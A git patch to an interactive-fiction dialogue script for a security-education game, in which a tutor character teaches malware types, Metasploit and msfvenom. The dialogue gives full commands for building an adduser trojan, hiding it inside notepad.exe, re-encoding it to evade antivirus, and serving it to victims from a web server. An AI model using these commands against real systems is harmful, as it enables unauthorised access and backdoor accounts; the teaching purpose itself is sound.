From 2cce9e245e7f24524536945dabcc01966ffc9bfd Mon Sep 17 00:00:00 2001 From: "Z. Cliffe Schreuders" Date: Wed, 19 Nov 2025 18:24:26 +0000 Subject: [PATCH] feat: Update malware_metasploit.ink for game narrative - convert to Haxolottle dialogue --- .../ink/game_scenarios/malware_metasploit.ink | 502 +++++++----------- 1 file changed, 200 insertions(+), 302 deletions(-) diff --git a/story_design/ink/game_scenarios/malware_metasploit.ink b/story_design/ink/game_scenarios/malware_metasploit.ink index 48813b3..01759af 100644 --- a/story_design/ink/game_scenarios/malware_metasploit.ink +++ b/story_design/ink/game_scenarios/malware_metasploit.ink 
@@ -1,165 +1,139 @@ -// =========================================== -// MALWARE AND METASPLOIT LAB -// Introduction to Malware and Payloads -// =========================================== -// Game-Based Learning replacement for lab sheet -// Original: introducing_attacks/2_malware_msf_payloads.md -// =========================================== +// Malware and Metasploit - Game Scenario Version +// Based on HacktivityLabSheets: introducing_attacks/2_malware_msf_payloads.md +// License: CC BY-SA 4.0 // Global persistent state -VAR instructor_rapport = 0 -VAR ethical_awareness = 0 +VAR haxolottle_rapport = 0 // External variables EXTERNAL player_name -// =========================================== -// ENTRY POINT -// =========================================== - === start === -Malware Specialist: Welcome to Malware Analysis and Metasploit Fundamentals, Agent {player_name}. +Haxolottle: {player_name}, want to learn about malware and payloads? -Malware Specialist: This lab covers malicious software - what it is, how it works, and how to create and analyze it in controlled environments. +~ haxolottle_rapport = 0 -Malware Specialist: Before we begin, ethical boundaries reminder: everything we cover is for authorized penetration testing and security research. Creating or deploying malware against systems you don't have explicit permission to test is illegal. +Haxolottle: Before we start, little axolotl - important ethical note: this is for authorized security testing only. + +Haxolottle: Creating or deploying malware against systems without explicit permission is illegal. Always have authorization. * [Understood - authorized testing only] - ~ ethical_awareness += 15 You: Clear. Authorized environments, defensive purpose, professional responsibility. - Malware Specialist: Excellent. Let's proceed. + Haxolottle: Good. Let's dive in. -> malware_hub -* [I understand the constraints] - ~ ethical_awareness += 5 +* [I understand] You: I understand the ethical boundaries. 
- Malware Specialist: Good. Keep that in mind throughout. + Haxolottle: Keep that in mind. Okay, what would you like to know? -> malware_hub -// =========================================== -// MAIN HUB -// =========================================== - === malware_hub === -Malware Specialist: What aspect of malware and Metasploit would you like to explore? +Haxolottle: What would you like to know about? -+ [Types of malware and classifications] ++ [Types of malware] -> malware_types -+ [Introduction to Metasploit Framework] ++ [Metasploit Framework] -> metasploit_intro + [Creating payloads with msfvenom] -> msfvenom_basics -+ [Anti-malware detection methods] ++ [Anti-malware detection] -> antimalware_detection -+ [Evasion techniques and polymorphic malware] ++ [Evasion techniques] -> evasion_techniques + [Remote Access Trojans (RATs)] -> rat_intro -+ [Show me the commands reference] ++ [Show me commands] -> commands_reference -+ [Practical challenge tips] - -> challenge_tips -+ [I'm ready for the lab exercises] - -> ready_for_practice -+ [That's all for now] ++ [I'm good for now] #exit_conversation -> END -// =========================================== -// MALWARE TYPES -// =========================================== - === malware_types === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Malware Specialist: Malware - malicious software. Programs designed to carry out harmful actions. +Haxolottle: Malware - malicious software. Programs designed to do harmful things. -Malware Specialist: Microsoft's old TechNet essay put it well: "If a bad guy can persuade you to run his program on your computer, it's not your computer anymore." +Haxolottle: Old Microsoft TechNet essay said it well: "If a bad guy can persuade you to run his program on your computer, it's not your computer anymore." -Malware Specialist: That's the core threat. A program running on your system has access to everything you have access to. If it runs as admin/root, even worse. 
+Haxolottle: That's the core threat, little axolotl. A program running on your system has access to everything you do. If it runs as admin or root, even worse. * [What are the main types?] You: How is malware classified? -> malware_taxonomy * [Why target Windows most?] You: Why is Windows the primary target? - Malware Specialist: Market share. Windows dominates desktop OS usage. More targets means more potential victims. - Malware Specialist: Though macOS, Linux, Android, iOS all have malware too. Platform diversity is shifting the landscape. - Malware Specialist: Also, each Windows version adds security mitigations. We test on Windows 7 in labs because its mitigations are well-understood and bypassable for learning purposes. - ~ instructor_rapport += 5 + Haxolottle: Market share. Windows dominates desktop usage. More targets, more potential victims. + Haxolottle: Though macOS, Linux, Android, iOS all have malware too. Platform diversity is changing things. + Haxolottle: Windows 7 is often used for learning because its security mitigations are well-understood and bypassable for educational purposes. + ~ haxolottle_rapport += 5 -> malware_types -* [Understood] +* [Got it] -> malware_hub === malware_taxonomy === -~ instructor_rapport += 8 +~ haxolottle_rapport += 8 -Malware Specialist: Main classifications: +Haxolottle: Here are the main types: -Malware Specialist: **Trojans** - malicious software posing as legitimate. Named after the Greek myth. A "game" that's actually a backdoor. +Haxolottle: **Trojans** - malicious software posing as legitimate. Named after the Greek myth. Like a "game" that's actually a backdoor. - Doesn't self-propagate - May provide remote access (RAT - Remote Access Trojan) - May spy on users (spyware, keyloggers) - May force advertising (adware) -Malware Specialist: **Viruses** - automatically spread to other programs on the same system. Infect executables, documents, boot sectors. 
+Haxolottle: **Viruses** - automatically spread to other programs on the same system. Infect executables, documents, boot sectors. -Malware Specialist: **Worms** - automatically spread to other computers on the network. Self-propagating across systems via exploits, email, etc. +Haxolottle: **Worms** - automatically spread to other computers on the network. Self-propagating via exploits, email, etc. -Malware Specialist: **Rootkits** - hide the presence of infection. Manipulate OS to conceal malicious processes, files, network connections. +Haxolottle: **Rootkits** - hide the infection. Manipulate the OS to conceal malicious processes, files, network connections. -Malware Specialist: **Zombies/Botnets** - infected systems receiving remote commands. Collections form botnets for DDoS, spam, crypto mining. +Haxolottle: **Zombies/Botnets** - infected systems receiving remote commands. Collections form botnets for DDoS, spam, crypto mining. -Malware Specialist: **Ransomware** - encrypts victim files, demands payment for decryption keys. Often uses cryptocurrency for anonymity. +Haxolottle: **Ransomware** - encrypts victim files, demands payment for decryption keys. Often uses cryptocurrency for anonymity. * [Tell me more about Trojans] - You: Trojans seem most relevant to this lab? - Malware Specialist: Correct. We'll focus on creating Trojan horses - programs that appear innocent but perform malicious actions. - Malware Specialist: Social engineering is key. Convince victim to run it. No exploitation required if they willingly execute it. - ~ instructor_rapport += 8 + You: Trojans seem most relevant? + Haxolottle: Yeah. Trojans are programs that appear innocent but do malicious things. + Haxolottle: Social engineering is key. Convince the victim to run it. No exploitation required if they willingly execute it. + ~ haxolottle_rapport += 8 -> malware_hub -* [How do these overlap?] - You: Can malware be multiple types? - Malware Specialist: Absolutely. 
A Trojan worm that installs a rootkit, for example. - Malware Specialist: Modern malware is often multi-stage: dropper Trojan delivers second-stage payload which installs persistent backdoor with rootkit capabilities. - Malware Specialist: Taxonomy helps us discuss and categorize, but real malware can be complex, multi-functional. - ~ instructor_rapport += 10 +* [Can malware be multiple types?] + You: Do these overlap? + Haxolottle: Absolutely. Like a Trojan worm that installs a rootkit. + Haxolottle: Modern malware is often multi-stage: dropper Trojan delivers second-stage payload which installs persistent backdoor with rootkit capabilities. + Haxolottle: The taxonomy helps us talk about it, but real malware can be complex and multi-functional. + ~ haxolottle_rapport += 10 -> malware_hub * [Got it] -> malware_hub -// =========================================== -// METASPLOIT FRAMEWORK -// =========================================== - === metasploit_intro === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Malware Specialist: Metasploit Framework - one of the most powerful penetration testing tools available. +Haxolottle: Metasploit Framework - one of the most powerful penetration testing tools out there. -Malware Specialist: Contains extensive library of exploits, payloads, auxiliary modules, and post-exploitation tools. Framework for developing custom exploits. +Haxolottle: Contains a huge library of exploits, payloads, auxiliary modules, and post-exploitation tools. It's also a framework for developing custom exploits. -Malware Specialist: Open source, maintained by Rapid7. Free framework version (what we use) and commercial Pro version with GUI. +Haxolottle: Open source, maintained by Rapid7. There's a free version and a commercial Pro version with a GUI. -Malware Specialist: We're using command-line tools - teaches you more about concepts and mechanics. +Haxolottle: Command-line tools teach you more about the actual concepts and mechanics. 
-* [What can Metasploit do?] +* [What can it do?] You: What's the scope of Metasploit's capabilities? - Malware Specialist: Enormous scope: + Haxolottle: Enormous scope, little axolotl: - Exploit development and execution - - Payload generation (what we're focusing on) - - Post-exploitation (once you've compromised a system) - - Auxiliary modules (scanners, sniffers, fuzzers) + - Payload generation + - Post-exploitation tools + - Auxiliary modules like scanners, sniffers, fuzzers - Evasion and anti-forensics - ~ instructor_rapport += 8 + ~ haxolottle_rapport += 8 -> metasploit_intro -* [Why is it legal to distribute?] +* [How is this legal?] You: How is this legal if it creates malware? - ~ ethical_awareness += 10 - Malware Specialist: Excellent question. Shows good critical thinking. - Malware Specialist: Metasploit is a *tool*. Hammer can build houses or break windows. The tool isn't illegal - misuse is. - Malware Specialist: Legitimate uses: penetration testing, security research, education, vulnerability assessment, red team exercises. - Malware Specialist: It's widely used by security professionals to identify weaknesses before attackers do. - ~ instructor_rapport += 15 + Haxolottle: Good question. Critical thinking! + Haxolottle: Metasploit is a *tool*. A hammer can build houses or break windows. The tool isn't illegal - misuse is. + Haxolottle: Legitimate uses: penetration testing, security research, education, vulnerability assessment, red team exercises. + Haxolottle: Security professionals use it to find weaknesses before attackers do. + ~ haxolottle_rapport += 15 -> metasploit_intro * [Tell me about payloads] You: What exactly is a payload? 
@@ -168,33 +142,33 @@ Malware Specialist: We're using command-line tools - teaches you more about conc -> malware_hub === payload_explanation === -~ instructor_rapport += 8 +~ haxolottle_rapport += 8 -Malware Specialist: Payload - the malicious code you want to execute on a victim's system. +Haxolottle: Payload - the malicious code you want to execute on a victim's system. -Malware Specialist: The "payload" is what the attack delivers. Exploit gets you access, payload is what you do with that access. +Haxolottle: The "payload" is what the attack delivers. Exploit gets you access, payload is what you do with that access. -Malware Specialist: Metasploit has hundreds of payloads: add users, open shells, steal data, capture screenshots, log keystrokes, establish persistent access. +Haxolottle: Metasploit has hundreds of payloads: add users, open shells, steal data, capture screenshots, log keystrokes, establish persistent access. -Malware Specialist: msfvenom is the tool for generating standalone payloads - creates executable files containing the payload code. +Haxolottle: msfvenom is the tool for generating standalone payloads - creates executable files containing the payload code. * [How do I see available payloads?] You: How many payloads exist? - Malware Specialist: `msfvenom -l payloads | less` lists them all. Hundreds. - Malware Specialist: Platform-specific: windows, linux, osx, android, etc. - Malware Specialist: Various functions: shells, meterpreter, exec commands, VNC, etc. - Malware Specialist: Each has configurable options for IP addresses, ports, usernames, etc. - ~ instructor_rapport += 5 + Haxolottle: `msfvenom -l payloads | less` lists them all. Hundreds. + Haxolottle: Platform-specific: windows, linux, osx, android, etc. + Haxolottle: Various functions: shells, meterpreter, exec commands, VNC, etc. + Haxolottle: Each has configurable options for IP addresses, ports, usernames, etc. 
+ ~ haxolottle_rapport += 5 -> payload_explanation * [What's the simplest payload?] You: What's a basic example? - Malware Specialist: `windows/adduser` - simply adds a user account to Windows. - Malware Specialist: Configuration: USER= (username), PASS= (password) - Malware Specialist: Generate: `msfvenom -p windows/adduser USER=hacker PASS=P@ssw0rd123 -f exe > trojan.exe` - Malware Specialist: Victim runs trojan.exe, new admin account created. Simple, effective Trojan. - ~ instructor_rapport += 5 + Haxolottle: `windows/adduser` - simply adds a user account to Windows. + Haxolottle: Configuration: USER= (username), PASS= (password) + Haxolottle: Generate: `msfvenom -p windows/adduser USER=hacker PASS=P@ssw0rd123 -f exe > trojan.exe` + Haxolottle: Victim runs trojan.exe, new admin account created. Simple, effective Trojan. + ~ haxolottle_rapport += 5 -> payload_explanation -* [Understood] +* [Got it] -> metasploit_intro // =========================================== @@ -202,13 +176,13 @@ Malware Specialist: msfvenom is the tool for generating standalone payloads - cr // =========================================== === msfvenom_basics === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Malware Specialist: msfvenom - Metasploit's payload generator. Combines old msfpayload and msfencode functionality. +Haxolottle: msfvenom - Metasploit's payload generator. Combines old msfpayload and msfencode functionality. -Malware Specialist: Generates standalone payloads in various formats: executables, shellcode, scripts, etc. +Haxolottle: Generates standalone payloads in various formats: executables, shellcode, scripts, etc. -Malware Specialist: Basic workflow: +Haxolottle: Basic workflow: 1. Choose payload 2. Configure options 3. Select output format 
@@ -219,63 +193,63 @@ Malware Specialist: Basic workflow: -> trojan_creation_walkthrough * [What output formats exist?] You: What formats can msfvenom generate? - Malware Specialist: `msfvenom -l formats` lists them all. - Malware Specialist: Common formats: + Haxolottle: `msfvenom -l formats` lists them all. + Haxolottle: Common formats: - exe: Windows executable - elf: Linux executable - dll: Windows library - python, ruby, perl: Scripts in various languages - c, java: Source code - raw: Raw shellcode - Malware Specialist: Choose format based on target platform and delivery method. - ~ instructor_rapport += 8 + Haxolottle: Choose format based on target platform and delivery method. + ~ haxolottle_rapport += 8 -> msfvenom_basics * [How do I configure payloads?] You: What about payload options? - Malware Specialist: `msfvenom -p payload_name --list-options` shows available options. - Malware Specialist: Common options: LHOST (attacker IP), LPORT (attacker port), RHOST (target IP), USER, PASS, etc. - Malware Specialist: Set with KEY=value syntax: `msfvenom -p windows/adduser USER=bob PASS=secret123` - ~ instructor_rapport += 5 + Haxolottle: `msfvenom -p payload_name --list-options` shows available options. + Haxolottle: Common options: LHOST (attacker IP), LPORT (attacker port), RHOST (target IP), USER, PASS, etc. 
+ Haxolottle: Set with KEY=value syntax: `msfvenom -p windows/adduser USER=bob PASS=secret123` + ~ haxolottle_rapport += 5 -> msfvenom_basics * [Back to main menu] -> malware_hub === trojan_creation_walkthrough === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 -Malware Specialist: Complete Trojan creation example: +Haxolottle: Complete Trojan creation example: -Malware Specialist: **Step 1:** Choose payload +Haxolottle: **Step 1:** Choose payload `msfvenom -l payloads | grep windows/adduser` -Malware Specialist: **Step 2:** Check options +Haxolottle: **Step 2:** Check options `msfvenom -p windows/adduser --list-options` -Malware Specialist: **Step 3:** Generate executable +Haxolottle: **Step 3:** Generate executable `msfvenom -p windows/adduser USER=backdoor PASS=SecurePass123 -f exe > game.exe` -Malware Specialist: **Step 4:** Deliver to victim (in lab: web server) +Haxolottle: **Step 4:** Deliver to victim (could use web server) `sudo cp game.exe /var/www/html/share/` `sudo service apache2 start` -Malware Specialist: **Step 5:** Victim downloads and runs game.exe +Haxolottle: **Step 5:** Victim downloads and runs game.exe (Social engineering: "Free game! Click to play!") -Malware Specialist: **Step 6:** Verify success +Haxolottle: **Step 6:** Verify success On victim system: `net user` shows new backdoor account -Malware Specialist: That's the basic flow. Simple but effective if victim trusts you enough to run the file. +Haxolottle: That's the basic flow. Simple but effective if victim trusts you enough to run the file. * [How do I make it less suspicious?] You: How do I make it seem legitimate? - Malware Specialist: Several techniques: icon changing, using templates, binding to legitimate programs, adding decoy functionality. - Malware Specialist: We'll cover evasion techniques separately. Short answer: embed payload in real program so it both executes malware AND runs expected functionality. 
- ~ instructor_rapport += 10 + Haxolottle: Several techniques: icon changing, using templates, binding to legitimate programs, adding decoy functionality. + Haxolottle: We'll cover evasion techniques separately. Short answer: embed payload in real program so it both executes malware AND runs expected functionality. + ~ haxolottle_rapport += 10 -> msfvenom_basics * [What about detection?] You: Won't anti-malware catch this? - Malware Specialist: Basic msfvenom payloads with default settings? Absolutely detected by modern anti-malware. - Malware Specialist: That's why we need evasion techniques - encoding, obfuscation, template injection. + Haxolottle: Basic msfvenom payloads with default settings? Absolutely detected by modern anti-malware. + Haxolottle: That's why we need evasion techniques - encoding, obfuscation, template injection. -> antimalware_detection * [Clear walkthrough] -> msfvenom_basics @@ -285,11 +259,11 @@ Malware Specialist: That's the basic flow. Simple but effective if victim trusts // =========================================== === antimalware_detection === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Malware Specialist: Anti-malware software - defensive tools attempting to detect and block malicious software. +Haxolottle: Anti-malware software - defensive tools attempting to detect and block malicious software. -Malware Specialist: Two main detection approaches: signature-based and anomaly-based. +Haxolottle: Two main detection approaches: signature-based and anomaly-based. * [Explain signature-based detection] You: How does signature-based detection work? 
@@ -299,69 +273,69 @@ Malware Specialist: Two main detection approaches: signature-based and anomaly-b -> anomaly_based * [How do I test against anti-malware?] You: How can I test my payloads? - Malware Specialist: ClamAV - open-source anti-malware scanner. - Malware Specialist: `clamscan` scans current directory for malware. - Malware Specialist: Basic msfvenom payloads get detected immediately. Tells you if your evasion worked. - Malware Specialist: VirusTotal.com tests against 50+ scanners - but uploading shares your malware with vendors. Good for testing, bad for operational security. - ~ instructor_rapport += 8 + Haxolottle: ClamAV - open-source anti-malware scanner. + Haxolottle: `clamscan` scans current directory for malware. + Haxolottle: Basic msfvenom payloads get detected immediately. Tells you if your evasion worked. + Haxolottle: VirusTotal.com tests against 50+ scanners - but uploading shares your malware with vendors. Good for testing, bad for operational security. + ~ haxolottle_rapport += 8 -> antimalware_detection * [Back to main menu] -> malware_hub === signature_based === -~ instructor_rapport += 8 +~ haxolottle_rapport += 8 -Malware Specialist: Signature-based detection - blacklist of known malware patterns. +Haxolottle: Signature-based detection - blacklist of known malware patterns. 
-Malware Specialist: **How it works:** +Haxolottle: **How it works:** - Malware researchers analyze malicious code - Extract unique signatures (byte patterns, hashes, code structures) - Add to signature database - Scanner compares files against database -Malware Specialist: **Advantages:** +Haxolottle: **Advantages:** - High accuracy for known threats - Low false positive rate - Resource efficient - Mature, well-understood technology -Malware Specialist: **Disadvantages:** +Haxolottle: **Disadvantages:** - Useless against unknown malware (zero-days) - Requires constant signature updates - Polymorphic malware can evade (same function, different code) - Always reactive, never proactive * [How do hashes relate to signatures?] - ~ instructor_rapport += 10 + ~ haxolottle_rapport += 10 You: You mentioned hashes earlier? - Malware Specialist: Simple signature approach: hash the entire malware file. - Malware Specialist: `sha256sum malware.exe` produces unique fingerprint. - Malware Specialist: Change one byte? Completely different hash. That's the evasion opportunity. - Malware Specialist: Re-encode payload → different file → different hash → evades hash-based detection. - Malware Specialist: Modern scanners use more sophisticated signatures than simple hashes, but principle remains. - ~ instructor_rapport += 10 + Haxolottle: Simple signature approach: hash the entire malware file. + Haxolottle: `sha256sum malware.exe` produces unique fingerprint. + Haxolottle: Change one byte? Completely different hash. That's the evasion opportunity. + Haxolottle: Re-encode payload → different file → different hash → evades hash-based detection. + Haxolottle: Modern scanners use more sophisticated signatures than simple hashes, but principle remains. 
+ ~ haxolottle_rapport += 10 -> signature_based * [Understood] -> antimalware_detection === anomaly_based === -~ instructor_rapport += 8 +~ haxolottle_rapport += 8 -Malware Specialist: Anomaly-based detection - identifies malicious behavior rather than known signatures. +Haxolottle: Anomaly-based detection - identifies malicious behavior rather than known signatures. -Malware Specialist: **How it works:** +Haxolottle: **How it works:** - Establish baseline of normal system behavior - Monitor processes, registry changes, network connections, file access - Flag deviations from normal as potentially malicious - May use machine learning, heuristics, behavioral analysis -Malware Specialist: **Advantages:** +Haxolottle: **Advantages:** - Detects unknown threats (zero-days) - Adapts to new attack methods - More comprehensive than signature matching - Less dependent on frequent updates -Malware Specialist: **Disadvantages:** +Haxolottle: **Disadvantages:** - False positives (legitimate software flagged) - Complex implementation and tuning - Resource intensive (continuous monitoring) 
@@ -369,23 +343,23 @@ Malware Specialist: **Disadvantages:** * [Give me an example] You: What behaviors trigger anomaly detection? - Malware Specialist: Suspicious patterns: + Haxolottle: Suspicious patterns: - Process creating multiple network connections - Modification of system files - Injection into other processes - Encryption of large numbers of files (ransomware behavior) - Keylogging-like keyboard hooks - Persistence mechanisms (registry keys, startup folders) - Malware Specialist: Problem: legitimate software sometimes does these things too. Anti-cheat software for games triggers false positives constantly. - ~ instructor_rapport += 10 + Haxolottle: Problem: legitimate software sometimes does these things too. Anti-cheat software for games triggers false positives constantly. + ~ haxolottle_rapport += 10 -> anomaly_based * [Which is better?] You: Which detection method is superior? - Malware Specialist: Both. Modern anti-malware uses layered approach. - Malware Specialist: Signature-based catches known threats efficiently. Anomaly-based catches unknowns. - Malware Specialist: Add heuristics, sandboxing, reputation scoring, machine learning - defense in depth. - Malware Specialist: No single method is perfect. Combine multiple for better coverage. - ~ instructor_rapport += 10 + Haxolottle: Both. Modern anti-malware uses layered approach. + Haxolottle: Signature-based catches known threats efficiently. Anomaly-based catches unknowns. + Haxolottle: Add heuristics, sandboxing, reputation scoring, machine learning - defense in depth. + Haxolottle: No single method is perfect. Combine multiple for better coverage. + ~ haxolottle_rapport += 10 -> anomaly_based * [Got it] -> antimalware_detection 
@@ -395,13 +369,13 @@ Malware Specialist: **Disadvantages:** // =========================================== === evasion_techniques === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Malware Specialist: Evasion - making malware undetectable to anti-malware scanners. +Haxolottle: Evasion - making malware undetectable to anti-malware scanners. -Malware Specialist: Key techniques: encoding, obfuscation, template injection, packing, encryption. +Haxolottle: Key techniques: encoding, obfuscation, template injection, packing, encryption. -Malware Specialist: Goal: change how malware looks without changing what it does. +Haxolottle: Goal: change how malware looks without changing what it does. * [Explain encoding] You: How does encoding help evasion? 
@@ -411,86 +385,86 @@ Malware Specialist: Goal: change how malware looks without changing what it does -> template_injection * [What's polymorphic malware?] You: You mentioned polymorphic malware earlier? - Malware Specialist: Polymorphic malware - changes its appearance while maintaining functionality. - Malware Specialist: Stores payload in encoded/encrypted form. Includes decoder stub that unpacks it at runtime. - Malware Specialist: Each iteration looks different (different encoding, different decryptor), but does the same thing. - Malware Specialist: This is what msfvenom encoders create - polymorphic payloads. - ~ instructor_rapport += 10 + Haxolottle: Polymorphic malware - changes its appearance while maintaining functionality. + Haxolottle: Stores payload in encoded/encrypted form. Includes decoder stub that unpacks it at runtime. + Haxolottle: Each iteration looks different (different encoding, different decryptor), but does the same thing. + Haxolottle: This is what msfvenom encoders create - polymorphic payloads. + ~ haxolottle_rapport += 10 -> evasion_techniques * [Back to main menu] -> malware_hub === encoding_evasion === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 -Malware Specialist: Encoding for evasion - re-encode payload so file looks different but executes identically. +Haxolottle: Encoding for evasion - re-encode payload so file looks different but executes identically. -Malware Specialist: msfvenom supports multiple encoders. View list: `msfvenom -l encoders` +Haxolottle: msfvenom supports multiple encoders. 
View list: `msfvenom -l encoders` -Malware Specialist: Common encoder: shikata_ga_nai (Japanese for "it can't be helped" - popular polymorphic encoder) +Haxolottle: Common encoder: shikata_ga_nai (Japanese for "it can't be helped" - popular polymorphic encoder) -Malware Specialist: Usage: +Haxolottle: Usage: `msfvenom -p windows/adduser USER=test PASS=pass123 -e x86/shikata_ga_nai -i 10 -f exe > encoded.exe` -Malware Specialist: `-e` specifies encoder, `-i` specifies iterations (encode 10 times) +Haxolottle: `-e` specifies encoder, `-i` specifies iterations (encode 10 times) * [Does more encoding help?] You: Is 10 iterations better than 1? - Malware Specialist: Diminishing returns. More iterations makes different file, but modern scanners analyze behavior, not just signatures. - Malware Specialist: Encoding helps evade simple hash/signature checks. Won't help against heuristic or behavioral analysis. - Malware Specialist: 5-10 iterations often sufficient for signature evasion. Beyond that, template injection more effective. - ~ instructor_rapport += 8 + Haxolottle: Diminishing returns. More iterations makes different file, but modern scanners analyze behavior, not just signatures. + Haxolottle: Encoding helps evade simple hash/signature checks. Won't help against heuristic or behavioral analysis. + Haxolottle: 5-10 iterations often sufficient for signature evasion. Beyond that, template injection more effective. + ~ haxolottle_rapport += 8 -> encoding_evasion * [Can I chain encoders?] You: Can I use multiple different encoders? - Malware Specialist: Absolutely. Pipe msfvenom outputs: + Haxolottle: Absolutely. Pipe msfvenom outputs: `msfvenom -p payload -e encoder1 -i 3 | msfvenom -e encoder2 -i 5 -f exe > multi_encoded.exe` - Malware Specialist: Each encoder transforms output differently. Chaining increases obfuscation. - Malware Specialist: Though again, modern AV looks deeper than surface encoding. 
- ~ instructor_rapport += 10 + Haxolottle: Each encoder transforms output differently. Chaining increases obfuscation. + Haxolottle: Though again, modern AV looks deeper than surface encoding. + ~ haxolottle_rapport += 10 -> encoding_evasion * [Understood] -> evasion_techniques === template_injection === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 -Malware Specialist: Template injection - embedding payload inside legitimate executable. +Haxolottle: Template injection - embedding payload inside legitimate executable. -Malware Specialist: Makes malware look like real software. Both malicious code AND original program execute. +Haxolottle: Makes malware look like real software. Both malicious code AND original program execute. -Malware Specialist: msfvenom `-x` flag specifies template executable: +Haxolottle: msfvenom `-x` flag specifies template executable: `msfvenom -p windows/exec CMD='net user /add hacker pass123' -x notepad.exe -f exe > my_notepad.exe` -Malware Specialist: Result: executable that opens Notepad (seems normal) while also adding user account (malicious). +Haxolottle: Result: executable that opens Notepad (seems normal) while also adding user account (malicious). * [Why is this effective?] You: How does this evade detection? - Malware Specialist: Several reasons: + Haxolottle: Several reasons: - File structure resembles legitimate program - Contains real code from original program - Signature scanners see legitimate program signatures too - Behavioral analysis sees expected behavior (Notepad opens) alongside malicious - Malware Specialist: Not perfect, but more effective than bare encoded payload. - ~ instructor_rapport += 10 + Haxolottle: Not perfect, but more effective than bare encoded payload. + ~ haxolottle_rapport += 10 -> template_injection * [What programs make good templates?] You: Which programs should I use as templates? - Malware Specialist: Context-dependent. Match victim's expectations: + Haxolottle: Context-dependent. 
Match victim's expectations: - Games for game-focused social engineering - Utilities (calc.exe, notepad.exe) for general purpose - Industry-specific software for targeted attacks - Malware Specialist: Smaller files better (less suspicious download size). - Malware Specialist: Legitimate signed programs add credibility. - ~ instructor_rapport += 8 + Haxolottle: Smaller files better (less suspicious download size). + Haxolottle: Legitimate signed programs add credibility. + ~ haxolottle_rapport += 8 -> template_injection * [Can I combine encoding and templates?] You: Can I use both techniques together? - Malware Specialist: Absolutely recommended. Encode first, then inject into template: + Haxolottle: Absolutely recommended. Encode first, then inject into template: `msfvenom -p payload -e encoder -i 7 | msfvenom -x template.exe -f exe > output.exe` - Malware Specialist: Layered evasion: encoding changes signature, template adds legitimacy. - Malware Specialist: In practice: well-encoded, template-injected payloads evade many scanners. - ~ instructor_rapport += 10 + Haxolottle: Layered evasion: encoding changes signature, template adds legitimacy. + Haxolottle: In practice: well-encoded, template-injected payloads evade many scanners. + ~ haxolottle_rapport += 10 -> template_injection * [Got it] -> evasion_techniques 
@@ -500,40 +474,40 @@ Malware Specialist: Result: executable that opens Notepad (seems normal) while a // =========================================== === rat_intro === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Malware Specialist: Remote Access Trojans (RATs) - malware providing attacker with remote control of victim system. +Haxolottle: Remote Access Trojans (RATs) - malware providing attacker with remote control of victim system. -Malware Specialist: Classic architecture: client-server model. +Haxolottle: Classic architecture: client-server model. - Server (victim runs this): listens for connections, executes commands - Client (attacker uses this): connects to server, sends commands -Malware Specialist: RAT capabilities typically include: remote shell, file transfer, screenshot capture, keylogging, webcam access, process manipulation. +Haxolottle: RAT capabilities typically include: remote shell, file transfer, screenshot capture, keylogging, webcam access, process manipulation. * [How do RATs differ from what we've done?] You: How is this different from adduser payload? - Malware Specialist: adduser is single-action. Runs once, adds user, exits. - Malware Specialist: RAT provides persistent, interactive access. Attacker can issue multiple commands over time. - Malware Specialist: More powerful, more flexible, more risk if detected. - ~ instructor_rapport += 8 + Haxolottle: adduser is single-action. Runs once, adds user, exits. + Haxolottle: RAT provides persistent, interactive access. Attacker can issue multiple commands over time. + Haxolottle: More powerful, more flexible, more risk if detected. + ~ haxolottle_rapport += 8 -> rat_intro * [What Metasploit payloads create RATs?] You: Which payloads provide remote access? 
- Malware Specialist: Several options: + Haxolottle: Several options: - windows/meterpreter/reverse_tcp - full-featured RAT - windows/shell/reverse_tcp - simple command shell - windows/vnc/reverse_tcp - graphical remote access - Malware Specialist: Meterpreter is most powerful - extensive post-exploitation features. - Malware Specialist: Reverse shells covered in later labs. Advanced topic. - ~ instructor_rapport += 8 + Haxolottle: Meterpreter is most powerful - extensive post-exploitation features. + Haxolottle: Reverse shells covered in later labs. Advanced topic. + ~ haxolottle_rapport += 8 -> rat_intro * [Why "reverse"?] You: What does "reverse" mean in reverse_tcp? - Malware Specialist: Normal: attacker connects TO victim (requires open port on victim, often firewalled). - Malware Specialist: Reverse: victim connects TO attacker (outbound connections usually allowed). - Malware Specialist: Victim initiates connection, attacker listens. Bypasses most firewalls. - Malware Specialist: Essential technique for real-world scenarios where victims are behind NAT/firewalls. - ~ instructor_rapport += 10 + Haxolottle: Normal: attacker connects TO victim (requires open port on victim, often firewalled). + Haxolottle: Reverse: victim connects TO attacker (outbound connections usually allowed). + Haxolottle: Victim initiates connection, attacker listens. Bypasses most firewalls. + Haxolottle: Essential technique for real-world scenarios where victims are behind NAT/firewalls. + ~ haxolottle_rapport += 10 -> rat_intro * [Understood] -> malware_hub 
@@ -543,112 +517,36 @@ Malware Specialist: RAT capabilities typically include: remote shell, file trans // =========================================== === commands_reference === -Malware Specialist: Quick reference for Metasploit and malware-related commands: +Haxolottle: Quick reference for Metasploit and malware-related commands: -Malware Specialist: **msfvenom basics:** +Haxolottle: **msfvenom basics:** - List payloads: `msfvenom -l payloads` - List encoders: `msfvenom -l encoders` - List formats: `msfvenom -l formats` - Show options: `msfvenom -p payload_name --list-options` -Malware Specialist: **Creating payloads:** +Haxolottle: **Creating payloads:** - Basic: `msfvenom -p windows/adduser USER=name PASS=pass -f exe > trojan.exe` - Encoded: `msfvenom -p payload -e x86/shikata_ga_nai -i 10 -f exe > output.exe` - With template: `msfvenom -p payload -x template.exe -f exe > output.exe` - Combined: `msfvenom -p payload -e encoder -i 5 | msfvenom -x template.exe -f exe > final.exe` -Malware Specialist: **Testing payloads:** +Haxolottle: **Testing payloads:** - Hash file: `sha256sum filename.exe` - Scan with ClamAV: `clamscan` - Scan specific file: `clamscan filename.exe` -Malware Specialist: **Web server (payload delivery):** +Haxolottle: **Web server (payload delivery):** - Create share directory: `sudo mkdir /var/www/html/share` - Copy payload: `sudo cp malware.exe /var/www/html/share/` - Start Apache: `sudo service apache2 start` - Access from victim: http://KALI_IP/share/malware.exe -Malware Specialist: **Windows victim verification:** +Haxolottle: **Windows victim verification:** - List users: `net user` - Check specific user: `net user username` + [Back to main 